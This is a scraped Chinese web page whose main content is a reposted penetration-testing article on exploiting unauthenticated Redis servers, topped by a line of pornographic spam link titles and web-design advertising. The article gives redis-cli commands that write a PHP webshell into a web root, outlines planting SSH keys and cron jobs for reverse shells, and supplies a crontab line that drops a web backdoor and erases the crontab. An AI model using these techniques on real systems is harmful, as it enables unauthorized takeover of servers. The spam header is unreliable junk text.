日韩无码专区无码一级三级片|91人人爱网站中日韩无码电影|厨房大战丰满熟妇|AV高清无码在线免费观看|另类AV日韩少妇熟女|中文日本大黄一级黄色片|色情在线视频免费|亚洲成人特黄a片|黄片wwwav色图欧美|欧亚乱色一区二区三区

RELATEED CONSULTING
相關(guān)咨詢
選擇下列產(chǎn)品馬上在線溝通
服務(wù)時(shí)間:8:30-17:00
你可能遇到了下面的問題
關(guān)閉右側(cè)工具欄

新聞中心

這里有您想知道的互聯(lián)網(wǎng)營銷解決方案
Redis匿名訪問利用技巧

Redis 數(shù)據(jù)庫在內(nèi)網(wǎng)滲透中比較常見,結(jié)合近期的利用過程,記錄下:

創(chuàng)新互聯(lián)是一家專注于網(wǎng)站建設(shè)、網(wǎng)站設(shè)計(jì)與策劃設(shè)計(jì),尼金平網(wǎng)站建設(shè)哪家好?創(chuàng)新互聯(lián)做網(wǎng)站,專注于網(wǎng)站建設(shè)十多年,網(wǎng)設(shè)計(jì)領(lǐng)域的專業(yè)建站公司;建站業(yè)務(wù)涵蓋:尼金平等地區(qū)。尼金平做網(wǎng)站價(jià)格咨詢:18982081108

在內(nèi)網(wǎng)機(jī)器中下載Redis 解壓 make一下,不用make install

A) 一般情況下知道路徑寫shell

 
 
 
 
    
  
  
  
  
  1. ./redis-cli -h IP 
    2. 
  
  
  
  
  2. config set dir /home/wwwroot/default/ 
    3. 
  
  
  
  
  3. config set dbfilename redis.php
    4. 
  
  
  
  
  4. set webshell " phpinfo(); ?>" 
    5. 
  
  
  
  
  5. save
    6.

B) 利用公匙免密碼登錄1 本機(jī)生成公匙2 利用redis將公匙備份到redis機(jī)器上C) 利用linux的任務(wù)反彈shell

1 /var/spool/cron linux機(jī)器下默認(rèn)的計(jì)劃任務(wù),開啟cron的時(shí)候,linux會定時(shí)去執(zhí)行里面的任務(wù),文件名為用戶名2 redis 設(shè)置dbfilename 到上面可以直接反彈shell回來

大概總結(jié)了主要是以上三種方式獲取redis服務(wù)器的權(quán)限,因?yàn)閞edis一般都是root權(quán)限啟動的,所以權(quán)限很大。

但滲透過程中總是會出現(xiàn)意向不到的情況,有木有啊。

第一種方式,如果redis數(shù)據(jù)庫太大,導(dǎo)致php馬超限,直接500不解析,那我們可以通過第三個(gè)命令寫個(gè)馬到web目錄

 
 
 
 
    
  
  
  
  
  1. */1 * * * * echo " phpinofo();?>" >/var/www/html/90sec.php;crontab -r
    2.

這樣的馬就沒問題了

第二種方式,我測試本機(jī)沒問題,但是到了滲透環(huán)境就出問題了,應(yīng)該是ssh免密碼登錄 .ssh目錄權(quán)限問題,成功幾率不太大

第三種方式,最喜歡的一種,簡單粗暴明了,連提權(quán)都省了(如果是重要的機(jī)器,root用戶一般都會有計(jì)劃任務(wù),建議先用低權(quán)限的用戶反彈個(gè)shell上去 探下情況,在root) 但也遇到很奇葩的不給連接外網(wǎng)的機(jī)器,那就只能寫個(gè)shell到web目錄,或者在內(nèi)網(wǎng)監(jiān)聽一個(gè)bashshell ,自己去連接就ok了

redis還有一個(gè)發(fā)現(xiàn)就是,高版本的linux提權(quán)不了,我們也可以通過redis直接提權(quán),也就是第三方軟件提權(quán)的一種方法吧。


標(biāo)題名稱:Redis匿名訪問利用技巧
當(dāng)前路徑:http://m.5511xx.com/article/cceiips.html